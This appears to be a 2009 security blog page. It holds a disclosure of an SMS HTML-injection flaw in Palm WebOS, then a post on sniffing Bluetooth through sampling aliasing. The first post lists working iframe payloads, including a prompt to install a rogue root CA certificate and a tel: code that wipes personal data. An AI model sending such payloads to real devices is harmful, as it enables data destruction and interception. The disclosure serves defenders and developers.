We understand, of course, that there are a number of competing interests that go into the development of a new mobile platform. There are demands from shareholders to get the product completed as quickly as possible, requirements from developers to make application development as easy as possible, requirements from manufacturers to make the product as cheap as possible, and requirements, from the (often not so popular) security oversight team, to make the product as safe as possible. We obviously do not expect Palm to focus solely on making the most secure of mobile platforms given all of these competing interests. However, we feel that Palm put almost no thought into security during the development of WebOS. All of the low hanging fruit we discovered should have been identified in the most basic of threat models, which should have been performed during the very early development stages of WebOS, well before any code was written. Had that happened, we imagine that slight changes to the underlying architecture of WebOS could have been implemented to protect against common web application vulnerabilities, or, at the very least, such vulnerabilities would not have surfaced in WebOS applications written by Palm themselves.

So what vulnerabilities are we talking about? What was uncovered after a few hours of poking around? The WebOS SMS client wasn’t performing input/output validation on any SMS messages sent to the handset. This led to a rudimentary HTML injection bug. Coupled with the fact that HTML injection leads directly to code injection in a WebOS application, the attacks made possible were quite dangerous (especially considering they could all be delivered via SMS). We have produced a video demonstrating some of these possible attacks.

In this video, a number of text messages were sent to the device. Leveraging the HTML injection, and some innate WebOS functionality, we were able to perform actions ranging from opening a website when the victim simply reads an SMS, to turning off the handset’s radio. Below is a list of the text messages we sent, along with the action each performed.

<iframe src='http://www.google.com'> - Open the web browser and point it to google.com

<iframe src='http://webos.ath.cx:50050/bad.doc'> - Start downloading a file using the handset's full radio bandwidth

<iframe src='http://www.archive.org/download/Peanut_Butter_Jelly_Time/pbj_512kb.mp4'> - Start streaming a video from the internet

<iframe src='http://rajweb.net/ubercert.crt'> - Ask the user to install a new root CA certificate

<iframe src='tel:#*#633#'> - Turn off the handset's radio

<iframe src='tel:#*#3366#'> - Ask the user to enter "demo" mode, erasing all personal data on the device

This demonstration focuses only on the SMS client, but the HTML injection bug may be present in a number of WebOS applications. Any app installed via the marketplace (even other Palm-developed apps) may be vulnerable to this or other common web application vulnerabilities. We hope that by seeing these attacks in action, WebOS application developers will know what kind of defenses they must code into their applications. We hope that by raising awareness of this threat, users will be aware of the dangers their WebOS applications can present, and that product managers will insist on security assurance testing before their offering goes live.


Digital Sampling Theory to the Rescue!!!

Posted: February 12, 2009 – 3:22 pm | Filed under: Conferences

Hello everyone, I’m Rajendra Umadas, the newest member of the Intrepidus team. I joined Intrepidus not too long ago and I’m loving every second of it. We just came back from ShmooCon, which was my first security conference. Shmoo was a great experience, and I’m excited to attend more cons. While a few of the talks were pretty informative, one in particular I found very interesting: Michael Ossmann and Dominic Spill spoke about how one can build an all-channel Bluetooth monitor. Their approach to solving this problem was ingenious. Quite honestly, any hack that allows us to capture data flows that were otherwise private is awesome; if that hack also relies on a basic theory of digital signal processing (I’ll get into that later) as well as the security concepts we are all well aware of, it becomes that much more interesting. This Bluetooth presentation had all of those traits.

I don’t plan on reproducing the presentation, since you can find that online. However, I do want to talk about what I believe was an interesting solution to a problem they ran into. But before I can get into the solution, I need to introduce the problem.

Bluetooth operates within 79 MHz of bandwidth, split into 79 channels, each 1 MHz wide. Devices hop pseudorandomly around those 79 channels 1600 times a second. All devices in a Bluetooth network (piconet) know the hopping pattern and listen on the right frequency at the right time. Ossmann and Spill were able to reverse out the hopping pattern of a piconet by passively listening to 25 channels using their USRP (a tool used to help create software radio implementations). The USRP can sample a 25 MHz bandwidth and pass all the data to a computer for processing, and they developed scripts that can reverse out the hop sequence from just a fraction of a piconet conversation.

Once the pattern is discovered, monitoring a Bluetooth stream can go in one of two directions: you can sniff one channel at a time, retuning the radio on every hop, or you can record all 79 channels and parse out the correct channel in the DSP software. Both paths have limiting factors. The first, retune per hop, cannot be done with the USRP: the 2.4 GHz card in the USRP cannot retune 1600 times a second, and therefore cannot hop as fast as the Bluetooth devices. One suggestion was to bootstrap a Bluetooth dongle with the correct hop sequence and let it do the sniffing, but if we are going to spend thousands on a USRP we damn well want to keep using it. The second path entails listening to all 79 channels, which would require 4 USRPs. However, buying 4 USRPs is 4 times harder than buying one. We need to find a cheaper way. Digital sampling theory to the rescue!

Using a principle called aliasing, Ossmann and Spill were able to turn their 25 MHz bandwidth USRP into one that can sample 79 MHz! Aliasing describes the phenomenon in which two distinct analog signals produce the same digital representation when sampled at a certain frequency, because at the sample points the two signals intersect. Refer to Figure 1 below. The two analog signals are obviously different frequencies; however, if they are sampled at the blue points, their digital representations are identical. Usually this is a phenomenon radio designers try to eliminate from their systems, because they need to read only one frequency, and the alias frequency would just add noise to the desired signal. Therefore many designs use band-pass filters to isolate one central frequency and eliminate the alias before sampling.

Figure 1. Aliasing in action.

However, for the purpose of Bluetooth monitoring, we do not need this filtering, because only one of the 79 channels is ever in use at a time; no channel will interfere with communication on another. Once the filter was located on the 2.4 GHz ISM board in the USRP, Ossmann and Spill could simply remove it, choose an appropriate sampling frequency, and rely on the aliased frequencies of the 25 MHz band to pick up the rest of the information. Problem solved: they can now use one USRP to sample the full Bluetooth band!
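A quick numerical sketch shows why this works: when sampling at rate fs, a tone at f and a tone at f + fs produce identical sample streams. The frequencies below were chosen for readability; they are illustrative, not Bluetooth's actual channel frequencies.

# Sketch: two tones separated by exactly the sampling rate alias to the
# same digital samples. Illustrative frequencies, not Bluetooth's.
import math

fs = 25e6        # sampling rate: 25 MHz, like the USRP's
f1 = 3e6         # a 3 MHz tone, inside the sampled band
f2 = f1 + fs     # a 28 MHz tone, outside the sampled band

for n in range(5):
    t = n / fs
    s1 = math.sin(2 * math.pi * f1 * t)
    s2 = math.sin(2 * math.pi * f2 * t)
    # sin(2*pi*(f1 + fs)*n/fs) = sin(2*pi*f1*n/fs + 2*pi*n) = s1
    print("sample %d: %+.6f vs %+.6f" % (n, s1, s2))

With the band-pass filter removed, an out-of-band Bluetooth channel simply shows up at its alias inside the 25 MHz window, where the DSP code can pick it out.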

So now that all your Bluetooth traffic are belong to us, the sky is the limit. As pointed out in the presentation, many of these devices do not encrypt traffic before it is transmitted, which opens the door to quite a number of attacks. There is the obvious consumer traffic that can now be sniffed (cell phones, keyboards, and so on). Bluetooth, however, also has a strong industrial footing, and a lot of these industrial applications are one-of-a-kind systems tailored for a specific facility. Any industrial facility that uses Bluetooth to monitor and control machinery must now consider this new threat to its assets: if there are any vulnerabilities in deployed Bluetooth systems, proprietary company information could leak into the wrong hands. The presentation also mentioned that active Bluetooth attacks can now be developed. Once you have the hopping order, you can inject traffic into a piconet, which may lead to DoS attacks, unauthorized access and control, and other devious actions against industrial equipment. Be forewarned…

-D1AB1069

(cross post on RajWeb)


